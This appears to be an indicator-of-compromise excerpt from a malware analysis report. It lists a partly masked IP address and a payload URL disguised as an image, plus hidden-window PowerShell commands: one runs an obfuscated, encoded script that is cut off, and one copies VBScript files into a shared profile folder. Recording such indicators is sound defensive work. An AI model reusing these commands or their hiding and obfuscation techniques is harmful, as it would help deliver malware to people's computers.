Technical Information
- '45.#4.19.84':80
- http://45.#4.19.84/xampp/bkp/vbs_novo_new_image.jpg
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgT...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Copy-Item -Path *.vbs -Destination %ALLUSERSPROFILE%\ff.exe.vbs' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgT...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Copy-Item -Path *.vbs -Destination %ALLUSERSPROFILE%\ff.exe.vbs